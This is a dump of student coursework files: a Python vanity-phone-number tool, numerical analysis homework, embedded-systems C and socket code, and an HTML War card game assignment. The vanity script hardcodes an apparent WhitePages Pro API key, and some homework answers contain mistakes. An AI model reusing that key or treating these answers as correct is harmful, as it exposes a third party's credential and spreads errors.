\"T\":(False, \"U\"),\n \"U\":(False, \"V\"),\n \"V\":(True, \"T\"),\n \"W\":(False, \"X\"),\n \"X\":(False, \"Y\"),\n \"Y\":(False, \"Z\"),\n \"Z\":(True, \"W\"),\n }\n return cycle[letter]\n\ndef 
convert_number(number):\n \"\"\" Converts the given number to the first mnemonics\n Pre:\n A number as a string\n Post:\n The first mnemonic created with that string\n or invalid sequence if there is a 0 or 1 in the\n number.\n \"\"\"\n # The conversion between letters and number\n convert = {'2':\"A\", '3':\"D\", '4':\"G\",\n '5':\"J\", '6':\"M\", '7':\"P\",\n '8':\"T\", '9':\"W\"}\n word = str()\n\n # Step through all the numbers for any non valid number\n # return invalid sequence\n for digit in number:\n if digit in convert:\n word += convert[digit]\n else:\n return \"Invalid Sequence\"\n\n # Return the mnemonic\n return word\ndef convert_word(word):\n \"\"\" Converts the given number to the first mnemonics\n Pre:\n A number as a string\n Post:\n The first mnemonic created with that string\n or invalid sequence if there is a 0 or 1 in the\n number.\n \"\"\"\n # The conversion between letters and number\n convert = {'2':\"A\", '3':\"D\", '4':\"G\",\n '5':\"J\", '6':\"M\", '7':\"P\",\n '8':\"T\", '9':\"W\"}\n vanity_number = \"\"\n\n # Step through all the numbers for any non valid number\n # return invalid sequence\n for letter in word:\n if letter.lower() >= \"w\":\n vanity_number += \"9\"\n elif letter.lower() >= \"t\":\n vanity_number += \"8\"\n elif letter.lower() >= \"p\":\n vanity_number += \"7\"\n elif letter.lower() >= \"m\":\n vanity_number += \"6\"\n elif letter.lower() >= \"j\":\n vanity_number += \"5\"\n elif letter.lower() >= \"g\":\n vanity_number += \"4\"\n elif letter.lower() >= \"d\":\n vanity_number += \"3\"\n elif letter.lower() >= \"a\":\n vanity_number += \"2\"\n\n\n # Return the mnemonic\n return vanity_number\n\ndef main ():\n \"\"\" Displays all the mnemonics that can formed from a given number\n Pre:\n None\n Post:\n All the mnemonics that can be formed\n \"\"\"\n\n # Determine if the user wants a vanity_number made from thier current number or a new number\n print(\"Welcome to vanity phone finder!\")\n response = raw_input(\"Would you like to find vanity numbers for an existing number? Y o N \\n\")\n\n if 'y' in response.lower():\n # In case of yes\n phone_number = raw_input(\"Please enter a 10 digit phone number with # used in place of the vanity part of your phone number ex: 706####232\\n\")\n vanity = raw_input(\"Please enter the vanity part of your phone number as a number ex: 5646 \\n\")\n word = convert_number(vanity)\n\n # For a invalid sequence print invalid.\n if word != \"Invalid Sequence\":\n sequences = listmnemonics(word)\n sequences = get_valid_words(sequences)\n vanity_phone_number = fill_numbers(sequences, phone_number)\n print (\"These words were found in your number: \")\n for i in vanity_phone_number:\n print i\n else:\n print (\"Invalid Number\")\n else:\n # In case the user is looking to get a new number\n phone_number = raw_input(\"Please enter a 10 digit phone number with # used in place of the vanity part of your phone number and ? 
in place of any numbers you do not care about: ex: 706###233?\\n \" )\n vanity_word = raw_input(\"What vanity word would you like to have in your phone number: ex: TOO \\n \")\n if len(phone_number) != 10:\n print(\"Invalid Phone Number\")\n return None\n # Convert the word into a number\n word_num = convert_word(vanity_word)\n\n # Get unused variants of the number\n possible_vanity_numbers = get_vanity_numbers(phone_number, word_num)\n print (\"The following numbers appear to not have an owner and may be for sale:\")\n for i in possible_vanity_numbers:\n print i\n\n\n\ndef get_vanity_numbers(phone_number, vanity_word):\n \"\"\" Forms a list of all the possible vanity number combinations.\n Pre:\n A phone number with # in place of the vanity word and ? in place of useless numers.\n A vanity word\n Post:\n A list of valid vanity numbers\n \"\"\"\n\n # Variables\n split_start = 0\n split_end = 0\n start = True\n counter = 0\n question_count = -1\n sequences = list()\n sequences.append(vanity_word)\n valid_numbers = list()\n\n # Get the count of open numbers\n for number in phone_number:\n if number == \"?\":\n question_count += 1\n\n # Find where to splice the phone number\n for count, number in enumerate(phone_number):\n if number == \"?\" and start:\n split_start = count\n start = False\n elif number == \"?\" and not start:\n split_end = count\n\n # Take care of only one question mark\n if question_count != 0:\n\n # Iterate through all possible numbers\n while str(counter) <= (\"9\" * question_count):\n new_number = phone_number[:split_start] + str(counter) + phone_number[split_end + 1:]\n counter += 1\n # Fill in the # with the vanity number\n valid_numbers.append(fill_numbers(sequences, new_number))\n else:\n\n for value in range(9):\n # Replace the ? 
with numbers\n location = phone_number.index(\"?\")\n new_number = phone_number[:location] + str(value) + phone_number[location + 1:]\n\n # Fill in the # with the vanity number\n valid_numbers.append(fill_numbers(sequences, new_number))\n\n # ______________________________________ THIS ONE ____________\n # Check to see if the allowed number\n allowed = list()\n for number in valid_numbers:\n # Make a request to the api\n response = do_request(number)\n json_response = json.load(response)\n # See if the number belongs to anyone\n if len(json_response[\"belongs_to\"]) == 0:\n allowed.append(number)\n # ______________________________________ THIS ONE ____________\n\n return allowed\n\ndef do_request(number):\n \"\"\" Makes a request to the White Pages Pro api\n Pre:\n A phone number\n Post:\n The data given by the white pages api\n \"\"\"\n api_key = \"2dd11dab27a849448ce5699b6cbe9cc0\"\n url = \"https://proapi.whitepages.com/3.0/phone?phone={0}&api_key={1}\".format(number,api_key)\n request = Request(url)\n response = urlopen(request)\n return response\n\ndef fill_numbers(sequences, phone_number):\n \"\"\" Forms a list of all the possible vanity number combinations.\n Pre:\n A phone number with # in place of the vanity word.\n A vanity word\n Post:\n A list of valid vanity numbers\n \"\"\"\n\n # Variables\n split_start = 0\n split_end = 0\n start = True\n pound_count = 0\n\n # Count the number of #\n for number in phone_number:\n if number == \"#\":\n pound_count += 1\n # Handel the special case of 0\n if pound_count == 0:\n return sequences\n\n vanity_numbers = list()\n\n # Find out where to split the text\n for count, number in enumerate(phone_number):\n if number == \"#\" and start:\n split_start = count\n start = False\n elif number == \"#\" and not start:\n split_end = count\n\n # Replace the # in all the phone numbers with the vanity word\n for number in sequences:\n new_number = phone_number[:split_start] + number + phone_number[split_end + 1:]\n vanity_numbers.append(new_number)\n return vanity_numbers\n\n\ndef get_valid_words(all_words):\n \"\"\" Checks to see if the vanity words found are valid words\n Pre:\n A list of all the owrds found\n Post:\n A list of valid words\n \"\"\"\n\n # Open relativent files\n word_file = open(\"valid_words.txt\", \"rw\")\n seek_positions = open(\"seek_positions.json\", \"rw\")\n valid_words = list()\n\n # Create a json from the file.\n word_locations = json.load(seek_positions)\n current_letter = all_words[0]\n found_word = \"\"\n\n # Loop through all the words\n while len(all_words) > 0:\n\n # Checks to see if the word is in the dictonary\n test_word = all_words[0].lower()\n\n # Removes none real words\n if test_word[0] != current_letter:\n current_letter = test_word[0]\n start_position = word_locations[current_letter]\n word_file.seek(start_position)\n else:\n # increments counter based on word\n # Go to next word if the test word is greater\n # change seek position if its less\n # add if its equal to the current word\n if found_word > test_word:\n all_words.remove(all_words[0])\n elif test_word == found_word:\n valid_words.append(test_word)\n all_words.remove(all_words[0])\n elif found_word < test_word:\n found_word = word_file.readline().lower()[:-2]\n\n return valid_words\n\ndef get_letter_locations():\n word_locations = open(\"seek_positions.json\", \"w\")\n word_file = open(\"valid_words.txt\", \"rb\")\n locations = dict()\n current_letter = \"a\"\n counter = 0\n for line in word_file:\n\n if current_letter == line[0].lower():\n 
locations[current_letter] = counter\n current_letter = chr(ord(current_letter) + 1)\n\n counter += len(line)\n\n for key in locations:\n word_file.seek(locations[key])\n line = word_file.readline()\n print(line,key)\n\n word_locations.write(json.dumps(locations, sort_keys=True, indent=4, separators = (',',': ')))\n\n\nmain()\n" }, { "alpha_fraction": 0.7007692456245422, "alphanum_fraction": 0.7792307734489441, "avg_line_length": 67.36842346191406, "blob_id": "324810484f9b47c183d145be75d4e7d7a1bd7b3b", "content_id": "ebaaa1159c830cf0f925bfd3590d2b0cafede12d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1300, "license_type": "no_license", "max_line_length": 599, "num_lines": 19, "path": "/MAT 433 - Numberical Analysis/HW_5/hw.md", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "# 1 \nA. 0.56720\nB. 0.73911\nC. 1.2926\nD. 1.3029\n\n# 2\nA. 0.56717\nB. 0.73812 \nC. 1.2927\nD. 1.3030\n\n# 3 \nA. 0.706914901733398\nB. 0.706913117192053\nC. Both methods converge to a value near 0.79691 although the value given by the secant method gives a more accurate representation of the zero for the function. As for performance of the secant method has 19 iterations while the bisection method has 17 iterations. This can be explained by the steep slopes near the zero. As a result of the steep slope, the secant method is required to get closer to the zero otherwise, the slight inaccuracy is amplified. Had the equation had a less steeper slope the secant method would have been more efficient. \n\n# 4\nThe bisect method was the most efficient with only 3 iterations, while the secant method had 7 iterations. The result of the calculation on the bisect method were also closer, as the bisect method gave a value of 1.2438, while the secant method gave 1.3837. In both performance the result of the bisect method was more desired. The secant method is not preferred on account of the shape of the graph, since the graph has a near linear slope near the zero. This near zero linear slope, means that the resulting value from the equation is near the stopping criteria, zero, but far away from the zero. 
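\n\nFor reference, minimal sketches of the two methods compared above (the function f, the bracket [a, b], the secant starting pair, and the tolerance are all assumed to be supplied by the caller; the names are illustrative):\n\n```python\ndef bisect(f, a, b, tol=1e-5):\n    # assumes f(a) and f(b) have opposite signs\n    while (b - a) / 2.0 > tol:\n        m = (a + b) / 2.0\n        if f(a) * f(m) <= 0:\n            b = m\n        else:\n            a = m\n    return (a + b) / 2.0\n\ndef secant(f, x0, x1, tol=1e-5):\n    # stops when f(x) is near zero, the criterion discussed above\n    while abs(f(x1)) > tol:\n        x0, x1 = x1, x1 - f(x1) * (x1 - x0) / (f(x1) - f(x0))\n    return x1\n```\n\nCounting the loop iterations in sketches like these is how iteration totals such as those above are obtained.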
\n" }, { "alpha_fraction": 0.5845012068748474, "alphanum_fraction": 0.605111300945282, "avg_line_length": 30.05128288269043, "blob_id": "12bc1377627a3234d8b0478bc81e9fdf6359b77a", "content_id": "933a833083acfbc60ad99a7d43caccd337343d1e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1213, "license_type": "no_license", "max_line_length": 86, "num_lines": 39, "path": "/CSC 386 - Embedded Systems/RC-Nespi/client.py", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "import serial\nimport socket\n\ndef read_controller(location):\n ''' Reads the input of the controller and sends the data over the\n network to the raspberry pi.\n '''\n\n # Establish a connection.\n port = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n # ip = input(\"IP: \")\n ip = \"192.168.0.100\"\n port_number = 8898\n port.connect((ip, port_number))\n reader = serial.Serial(location,115200,timeout=1)\n while True:\n # Remove the useless characters being read.\n reading = str(reader.readline()).split(\"'\")\n reading = reading[1]\n reading = reading[:-4]\n\n # Only transmit on an input.\n if len(reading) > 0:\n # Convert the string being read into an int and read it as a binary value.\n reading = int(reading,2)\n # Print out the readings\n print(reading)\n # Encode the data to be transmitted.\n encoded_reading = str(reading).encode()\n # Transmit it over the net.\n port.sendall(encoded_reading)\n\n\n\n\n# Determine the serial location that will be used to read the file.\nif __name__ == \"__main__\":\n location = input(\"Serial: \")\n read_controller(location)\n\n\n" }, { "alpha_fraction": 0.5429362654685974, "alphanum_fraction": 0.5678670406341553, "avg_line_length": 19.628570556640625, "blob_id": "059b6193f34422ebab3c2a385cc00d3554163531", "content_id": "867ba05925c3049829c4dfc482245ab43887733a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 722, "license_type": "no_license", "max_line_length": 51, "num_lines": 35, "path": "/CSC 386 - Embedded Systems/C_Basic/State_Machine_2/counter.c", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <stdlib.h>\n#include <stdbool.h>\n#include <unistd.h>\n#include <ctype.h>\n\n#define SLEEPING 0\n#define READING 1\n\nint main(int argc, char* argv[]){\n // Prints out Reading after every 100000 cycles\n int counter = 0;\n int state = SLEEPING;\n do{\n switch(state){\n case SLEEPING:\n // Increment the counter\n counter += 1;\n\n // Check if its ready to switch states\n if (counter == 100000){\n state = READING;\n }\n break;\n case READING:\n // Reset the state back to the inital state\n state = SLEEPING;\n counter = 0;\n // Print Reading\n printf(\"READING\\n\");\n break;\n }\n }while(true);\n return 0;\n}\n" }, { "alpha_fraction": 0.6377328634262085, "alphanum_fraction": 0.7209671139717102, "avg_line_length": 43.26315689086914, "blob_id": "4f5ccb9e511f4ed412e5d3052e5c0fd2ec23beb9", "content_id": "ccdfe034d68f1e50a4495c97ef9536515a659969", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2523, "license_type": "no_license", "max_line_length": 382, "num_lines": 57, "path": "/MAT 433 - Numberical Analysis/Midterm/Midterm.md", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "# 1 \n```python:\nn_1 = input(\"numberator 1\")\nd_1 = input(\"denominator 1\")\nn_2 = input(\"numberator 2\")\nd_2 = 
input(\"denominator 2\")\n\nsame_base = d_2 * d_1\nn_1 = d_2 * n_1\nn_2 = d_1 * n_2\n\nnumberator_sum = n_1 + n_2\nwhole_number = floor(same_base/numberator_sum)\nremainder = numberator_sum - (same_base * whole_number)\nprint( whole_number, remainder/same_base)\n\n```\n\n\n# 3\nOn an eight bit system we need to break it up so that we can denote, positive and negative numbers. Also we need some kind of exponential to allow larger numbers, and we also need the base number as well. This could be done using the following format: \n\nS E E E B B B B\n\nS - Sign\nE - Exponent \nB - Base\n\nFurthermore, we can expand the size of the base by having an extra implicit base, so they obtain the form of 1.B B B B. This gives us 5 bits for the base.\n\nAlthough, we still need a method for representing the exponent in both as both positive or negative. We can represent the values by creating an offset based on the value of the exponent like so:\n\n000 -inf\n001 -2\n010 -1\n011 0\n100 1\n101 2\n110 3\n111 inf\n\nThis allows us to expand the base by 2^3. Thus in the largest number that could be formed, would be a positive number with the largest possible base and the largest exponent. This gives:\n\n0 1 1 0 1 1 1 1 -> This gives a positive number with a base of: 1.1111 since we have the implied extra 1. Then we have an exponent of 2, so this gives a value of +1111.1 or (2^4 - 1) + .5 = 15.5\nAs for the smallest it would be a negative number with the lowest possible base:\n0 0 0 1 0 0 0 0 -> This gives a base of 1.0000 along with an exponent with -2, thus .010000 giving a value of 2^-2 = .25 as the smallest value\n\nAs for the machine epsilon would be the smallest change possible from 1 thus it would be a positive number with a base of 1 and the minimum base. \nThis gives: 1 0 0 0 0 0 0 1: This gives a base of 1.0 0 0 1, with an exponent of 0 meaning the smallest shift is 2^-4 or +/-0.0625. \n\n# 4\nx = 10000000 is the most accurate. This is on account of the errors in representing the value -0.000001, which can not be represented in decimal without some kind of rounding while 1000000 can be represented accurately by 11110100001001000000. 
\n\n# 4\nx = 1000000 is the most accurate. This is on account of the errors in representing the value -0.000001, which cannot be represented exactly in binary without some kind of rounding, while 1000000 can be represented exactly as 11110100001001000000. The ability to represent the data exactly means that it does not start with a rounding error, and so it starts out more accurate than -0.000001.\nAlgebraically we can find the roots as:\nx^2 - 10^6x + 1*10^-6x - 1 = 0\nx(x - 10^6) + 10^-6(x - 10^6) = 0\n(x + 10^-6)(x - 10^6) = 0\nThe zeros are: -10^-6 and 10^6\n" }, { "alpha_fraction": 0.6941362619400024, "alphanum_fraction": 0.7036449909210205, "avg_line_length": 40.93333435058594, "blob_id": "23f3d24c218991e5c56088f68a6a355aad1a9ae8", "content_id": "2d0e834406604cd08dfb55363b42f8f52ad436ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 631, "license_type": "no_license", "max_line_length": 92, "num_lines": 15, "path": "/CSC 236 - Software Design/IntrotoC++/helloworld.cpp", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "\n/* Course: CSC 236 Introduction to Programming with C++\n   Name: Jesson Soto\n   Assignment A06: Hello world\n   Description: This default C++ program types \"Hello world!\" on the screen\n   All of the code in this program was generated by Code::Blocks */\n\n#include <iostream> //This statement includes the input/output library\n\nusing namespace std; //this is for the standard (std) namespace\n\nint main() //all C++ programs will begin with a main function\n{\n    cout << \"Hello world!\" << endl; //cout stands for \"console output\"... 
\n return 0; //this returns control to the calling system and indicates no errors occurred.\n}\n\n" }, { "alpha_fraction": 0.5299538969993591, "alphanum_fraction": 0.557603657245636, "avg_line_length": 20.700000762939453, "blob_id": "4b07474a8fca9af99314e81927b1e022f32507b5", "content_id": "2b2991eafaba3a1c998c746f8acf4a04a1517ccd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 217, "license_type": "no_license", "max_line_length": 71, "num_lines": 10, "path": "/CSC 386 - Embedded Systems/C_Basic/State_Machine_1/ext5.c", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "#include <stdio.h>\nint main(){\n int summation = 0;\n int count = 10;\n for(int i = 0; count >= i; i++){\n summation += i;\n }\n printf(\"The sum of the numbers 0 to %d is %d\\n\", count, summation);\n return 0;\n}\n" }, { "alpha_fraction": 0.5980681777000427, "alphanum_fraction": 0.6050748229026794, "avg_line_length": 54.2929573059082, "blob_id": "954b07c44b0fdd2d0eae69579efc00d091aaf6d6", "content_id": "2603d95074d095297f5cf89352227481fb7fca19", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 19982, "license_type": "no_license", "max_line_length": 142, "num_lines": 355, "path": "/CSC 236 - Software Design/War/a11.stacks-queues.html", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n <head>\r\n <meta content=\"text/html; charset=utf-8\" http-equiv=\"content-type\">\r\n <link rel=\"stylesheet\" href=\"../styles/csc236.css\" type=\"text/css\">\r\n <link href=\"../styles/csc236.css\" type=\"text/css\" rel=\"stylesheet\">\r\n <link rel=\"icon\" href=\"../images/favicon.ico\" type=\"image/x-icon\">\r\n <link rel=\"shortcut icon\" href=\"../images/favicon.ico\" type=\"image/x-icon\">\r\n <!--Force IE6 into quirks mode with this comment tag-->\r\n <title> Tasks | Data Structures | Berea College</title>\r\n <meta name=\"viewport\" content=\"width=device-width, minimum-scale=1.0, maximum-scale=1.0\">\r\n <!--[if lt IE 9]>\r\n <script src=\"scripts/html5.js\"></script> <![endif]-->\r\n <script type=\"text/javascript\" src=\"../scripts/respond.min.js\"></script>\r\n </head>\r\n <body>\r\n <div id=\"wrapper\">\r\n <header>\r\n <nav id=\"skipTo\">\r\n <ul>\r\n <li> <a href=\"#main\" title=\"Skip to tasks\">skip to tasks</a> </li>\r\n </ul>\r\n </nav>\r\n <hr>\r\n <h1>CSC 236 Data Structures</h1>\r\n <nav>\r\n <ul>\r\n <li><a href=\"../index.html\" title=\"tasks\">TASKS</a></li>\r\n <li><a href=\"../resources.html\" title=\"resources\">RESOURCES</a></li>\r\n <li><a href=\"../about.html\" title=\"about\">ABOUT</a></li>\r\n <li><a href=\"http://moodle2.berea.edu\" title=\"Moodle2\" target=\"_blank\">MOODLE2</a></li>\r\n </ul>\r\n </nav>\r\n <div id=\"logo\"> <img src=\"../images/bc-tree.png\" alt=\"csc236 logo\">\r\n <hr> </div>\r\n </header>\r\n <br>\r\n <!-- end header -->\r\n <div id=\"main\"> <br>\r\n <h3> A11: Stacks, Queues, and the Card Game War</h3>\r\n <p> First a bit about stacks and queues...</p>\r\n <h4>Queues</h4>\r\n <p>A <em><strong>queue</strong></em> is an important data structure\r\n that orders items according to when they arrive. Hence, the ordering\r\n of a queue is first in, first out (FIFO). When you wait in that long\r\n line to get into Berea's food service, you are in a queue. 
In fact,\r\n British English speakers don't say \"wait in line\", they say \"wait on\r\n queue.\" <br>\r\n <br>\r\n We have seen a Queue ADT implemented in Python in our text in a\r\n simulation of waiting times at a cash register. In addition, your\r\n instructors have created a simpler example which used the Queue ADT\r\n that builds a story word by word. <br>\r\n <br>\r\n Please download these files, run them and try to understand them:</p>\r\n <ul>\r\n <li><a target=\"_blank\" href=\"queue_example_py.zip\">queue_example_py.zip</a></li>\r\n <li><a target=\"_blank\" href=\"simulaton_example_py.zip\">simulaton_example_py.zip</a></li>\r\n </ul>\r\n <br>\r\n <h4>Stacks</h4>\r\n <p>A useful data structure called a stack models a real-world stack of\r\n items in which you can only safely add or remove an item from the top\r\n of a stack. A stack is also referred to as a last in, first out (LIFO)\r\n data structure. <br>\r\n <br>\r\n Our text gave the example of using a stack to match bracket types in\r\n an expression which includes ( ), [ ], { } like:</p>\r\n <div class=\"indent\" style=\"margin-top:-10px\"><code>{(2+x)/4-}-[(x-4)*(x+1)}</code></div>\r\n <p> The following code is modified to make it more understandable.\r\n Please download it and try to understand it:</p>\r\n <ul>\r\n <li><a target=\"_blank\" href=\"stack_example_py.zip\">stack_example_py.zip</a></li>\r\n </ul>\r\n <br>\r\n <h3>The War Car Game</h3>\r\n <p>We will be putting these ideas to use in the card game called \"War.\"</p>\r\n <h3>The deck</h3>\r\n <p>In this card game, we will use multiple decks of cards of the type in\r\n the image above. Each of the cards in these special decks of cards has\r\n a number between 0 and 9 on its face, so the value of each card can be\r\n represented by an integer. Hence one deck has only 10 cards: 0, 1, 2,\r\n 3, 4, 5, 6, 7, 8, and 9. <img style=\"max-width:100%; width:auto; height:auto; margin-top:10px\"\r\r\n alt=\"Modified UNO Cards\" src=\"../images/uno-number-cards.jpg\"> This\r\n game will use 5 sets of these decks.</p>\r\n <h4>Playing Piles and Storage Piles</h4>\r\n <p> This game uses six \"piles\" of cards during the game. Each player\r\n will have their own <strong>playing pile</strong> of cards and their\r\n own <strong>storage pile</strong> of cards. There is a single common\r\n <strong>loot pile</strong> in the center of the table. The dealer (who\r\n is not a player) also has a <strong>dealing pile</strong>. All piles\r\n will start out empty. Each pile will be represented by either a queue\r\n or a stack because addition, removal, and access can only occur at an\r\n end.</p>\r\n <h4>Dealing</h4>\r\n <p> Prior to starting the rounds of play, the dealer will pick up 5 new\r\n shrink-wrapped decks of cards from the dealer's cabinet, which the\r\n dealer will unwrap and shuffle. (Note that this is an important\r\n detail, as shuffling is not a standard feature of either the Stack or\r\n Queue classes.) After shuffling the cards, the dealer will add them\r\n one by one to the top of the <strong>dealing pile</strong>. <br>\r\n <br>\r\n Next, 50 cards will be dealt one by one from the top of the dealing\r\n pile to the top of each <strong>playing pile</strong> alternating\r\n between playing piles. <em>Hint: The fact that the <b>top</b> of the\r\n dealing pile is there cards are added and removed should tell you\r\n which data structure to use for this pile.</em> <br>\r\n <br>\r\n After the cards are dealt, there will be 25 cards in each playing\r\n pile. 
These cards are kept face-down in the respective playing piles.\r\n Neither player may look at the cards in these playing card piles, and\r\n the storage piles for both players will be empty. </p>\r\n <h4>Beginning <span style=\"font-style: italic;\"></span>Play</h4>\r\n <p> In each roun<span style=\"font-style: italic;\"><span style=\"font-weight: bold;\"></span></span>d\r\n of play, both players will (essentially simultaneously) remove a card\r\n from the top of their playing piles, displaying them face-up on the\r\n table where they can be seen by both players.&nbsp; <em>Hint: The\r\n fact that cards can only be added to and removed from the <strong style=\"text-decoration: underline;\">top\n </strong>of the playing piles should sufficient information to\r\n determine which data structure to use for the playing piles.</em></p>\r\n <h4> Refilling the Playing Pile</h4>\r\n <p>Whenever a player's playing pile becomes empty, her or she will\r\n immediately try to refill her playing pile by completely emptying his\r\n or her storage pile. The newly refilled playing pile should have the\r\n cards in the same order as the existing storage pile.&nbsp; But, the\r\n cards must be moved one by one.&nbsp;<em> Hint: Since the playing\r\n piles can only be added to on the top, this should be enough\r\n information to help you decide what data structure to use for the\r\n storage piles.</em></p>\r\n <h4>Each Round of Play</h4>\r\n <p> In each round of play:<br>\r\n </p>\r\n <ul>\r\n <li> If one player displays a higher ranking card, he or she will\r\n collect both of the displayed cards, and will add them one at a time\r\n to the top of his or her storage pile. </li>\r\n <li>If both players display cards of the same value (eg. each player\r\n displays a 9 card), this will start a \"War\" in this round of play.\r\n When \"War\" breaks out, the following happens:\r\n <ol style=\"list-style-type: upper-roman;\">\r\n <li>The single loot pile located in the middle of the table will\r\n be used, and the two cards of the same value will be added to\r\n the top of the loot pile. </li>\r\n <li> Both players will then remove an additional card from the top\r\n of their playing pile and add them to the top of the loot pile\r\n without looking at them. </li>\r\n <li> Then each player will remove one additional card from his or\r\n her playing pile, and will display it face-up on the table.\r\n These two newly displayed cards will determine what happens\r\n next:\r\n <ol style=\"list-style-type: upper-alpha;\">\r\n <li> If these newly displayed cards differ, the player who\r\n displayed the higher ranking card will win all six cards\r\n (the two displayed cards as well as the four cards currently\r\n in the loot pile). These six cards must be added one by one\r\n to the winner's storage pile, while the central loot pile is\r\n emptied. Note that the cards must retain the same order in\r\n the storage pile as their order in the loot pile.<em> Hint:\r\n This should help you to determine which data structure to\r\n use for the loot pile </em><em>since cards are only added\r\n at the top of the loot pile and order must be maintained\r\n as they are transferred one by one to the storage pile.<br>\r\n </em></li>\r\n <li> If these two newly displayed cards are two more\r\n identically numbered cards, the state of \"War\" will continue\r\n (You will repeat starting at back at roman number I. i.e.\r\n These two cards will be added to the loot pile....) 
<br>\r\n The loot pile will continue to grow until there is a winner\r\n who will take the two displayed cards as well as the entire\r\n loot pile, removing all of the cards from the loot pile one\r\n by one and adding all of these cards to his or her storage\r\n pile until the loot pile is empty. </li>\r\n </ol>\r\n </li>\r\n </ol>\r\n </li>\r\n </ul>\r\n <br>\r\n <h4> On Winning</h4>\r\n <p> If a player's playing pile and storage pile both become empty at the\r\n same time, he or she had run out of cards and immediately loses the\r\n game. In other words, rounds of play continue until one player has all\r\n 50 of the original cards. </p>\r\n <h4> An Additional Hint </h4>\r\n <p>The random library contains a shuffle function.</p>\r\n <div style=\"margin-top:-10px; margin-left:40px\"> <code>import random<br>\r\n random.shuffle(cardset) <span class=\"comment\"># might be useful to\r\n the dealer</span></code></div>\r\n <br>\r\n <hr> <br>\r\n <h3> Assignment Specifics </h3>\r\n <p> This assignment is to be completed individually or in pairs (your\r\n choice!!) <br>\r\n If you decide to work with a partner, be sure to follow good \"<a href=\"http://cs.berea.edu/courses/csc226/CSC226PairProgram.pdf\"\r\r\n target=\"_blank\">pair-programming</a>\" practices as you did for\r\n CSC226. <br>\r\n <br>\r\n Write a Python program that employs the provided Stack and Queue\r\n classes to implement the Game of War as described above. In your\r\n implementation, the user will play against the computer. Note that the\r\n implementation of the game should be done using only the standard\r\n features of each of these data structures. <br>\r\n <br>\r\n After each action, your program should print (or otherwise display)\r\n the values of the cards which are displayed in that round of play, and\r\n should state what happens (such as \"You win!\" or \"Two 5's displayed so\r\n War breaks out\".) Have fun with your program. 
<br>\r\n <br>\r\n Here are some requirements: </p>\r\n <ol>\r\n <li> Your program MUST use the Stack and Queue classes provided with\r\n the examples above to implement each of the needed piles of cards.</li>\r\n <br>\r\n <li> You MUST create your own new class and driver modules for this\r\n game.</li>\r\n <br>\r\n <li> You MUST document your code effectively with the appropriate\r\n docstrings and comments interspersed with your source code.</li>\r\n </ol>\r\n <p>You might find the following prototype design notion useful, but you\r\n may vary from this design if you choose.</p>\r\n <div class=\"indent\" style=\"margin-top:-10px\">\r\n <pre><span class=\"keyword\">class</span> War:\r\n \r\n <span class=\"comment\"># possibly useful instance variables</span>\r\n <span class=\"keyword\">self</span>.myCurrent <span class=\"comment\"># my currently displayed card</span>\r\n <span class=\"keyword\">self</span>.otherCurrent <span class=\"comment\"># other currently displayed card</span>\r\n <span class=\"keyword\">self</span>.currentState <span class=\"comment\"># keeps track of the state of play</span>\r\n <span class=\"keyword\">self</span>.dealingPile <span class=\"comment\"># queue or stack</span>\r\n <span class=\"keyword\">self</span>.myPayingPile <span class=\"comment\"># queue or stack</span> \r\n <span class=\"keyword\">self</span>.myStoragePile <span class=\"comment\"># queue or stack</span>\r\n <span class=\"keyword\">self</span>.otherPlayingPile <span class=\"comment\"># queue or stack</span> \r\n <span class=\"keyword\">self</span>.otherStoragePile <span class=\"comment\"># queue or stack</span>\r\n <span class=\"keyword\">self</span>.lootPile <span class=\"comment\"># queue or stack</span>\r\n\r\n War() \r\n <span class=\"comment\"># Constructor initializes all instance variables</span>\r\n\r\n add_dealingPile()\r\n <span class=\"comment\"># adds the shuffled decks of cards to the dealer's pile</span>\r\n \r\n deal()\r\n <span class=\"comment\"># deals out 25 cards from to each player's playing pile from shuffled dealers pile</span>\r\n\r\n make_move()\r\n <span class=\"comment\"># initiates a round of play and communicates play-by-play during the round\r\n # returns true when the game is still in play\r\n # returns false when the game is over\r\n # Communicates an appropriate message about whether the user beat the computer</span>\r\n\r\n remove_my_card()\r\n <span class=\"comment\"># Precondition: myPlayingPile is not empty \r\n # If it is not empty, the function removes a card from myPlayingPile, \r\n # returning the stored value</span>\r\n \r\n remove_other_card()\r\n <span class=\"comment\"># Precondition: otherPlayingPile is not empty \r\n # If it is not empty, the function removes a card from otherPlayingPile,\r\n # returning the stored value</span>\r\n \r\n display_card()\r\n <span class=\"comment\"># displays a card on the screen and returns the value</span>\r\n \r\n compare_cards()\r\n <span class=\"comment\"># compares myCurrent to otherCurrent and behaves appropriately </span> \r\n \r\n move_my_loot()\r\n <span class=\"comment\"># moves everything from lootPile to myStoragePile</span> \r\n \r\n move_other_loot()\r\n <span class=\"comment\"># moves everything from lootPile to otherStoragePile</span>\r\n \r\n move_my_storage()\r\n <span class=\"comment\"># moves everything from myStoragePile to myPlayingPile</span>\r\n \r\n move_other_storage()\r\n <span class=\"comment\"># moves everything from otherStoragePile to otherPlayingPile</span></pre>\r\n </div>\r\n <br>\r\n 
